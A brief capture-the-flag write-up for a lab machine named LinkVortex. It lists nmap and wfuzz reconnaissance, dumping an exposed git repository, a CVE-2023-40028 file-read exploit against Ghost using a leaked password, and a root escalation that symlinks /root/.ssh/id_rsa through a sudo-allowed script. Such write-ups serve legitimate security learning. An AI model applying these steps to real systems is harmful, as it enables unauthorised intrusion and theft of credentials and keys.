-
I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.47 -oG scan
nmap -p22,80 -sCV -Pn 10.10.11.47 -oN ports
-
I go to the site and see that a de-tialized version of Ghost is running. I find that it has a vulnerability, CVE-2023-40028. I need to find a valid credential to be able to abuse this vulnerability.
-
I do a search for subdomains and I find one.
wfuzz -c -t 100 --hh=230 -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -H "Host: FUZZ.linkvortex.htb" http://linkvortex.htb
-
When listing the found subdomain I find a git repository. I download it with git-dumper
git-dumper "http://dev.linkvortex.htb/.git" /home/rufo/linkVortex/content/example
-
I search in the repository files and find some passwords. I try with the passwords I found and the vulnerability I found before and I manage to find some valid credentials.
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
-
I modify the script to point to the endpoint and I manage to read internal files of the machine. LFI
-
I list the repository files and manage to find some credentials in the production environment configuration file
-
Thanks to these credentials I am able to log in via ssh and read the first flag
- Listing the system files, I see that I can execute as root the file clean_symlink.sh and passing any file as argument.
-
I create a couple of symbolic links to be able to read the file with the ssh key of the root user.
ln -s /root/.ssh/id_rsa link1.txt
ln -s /tmp/a/link1.txt duo.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /tmp/a/duo.png
-
With this key I connect via ssh as root and manage to read the second flag
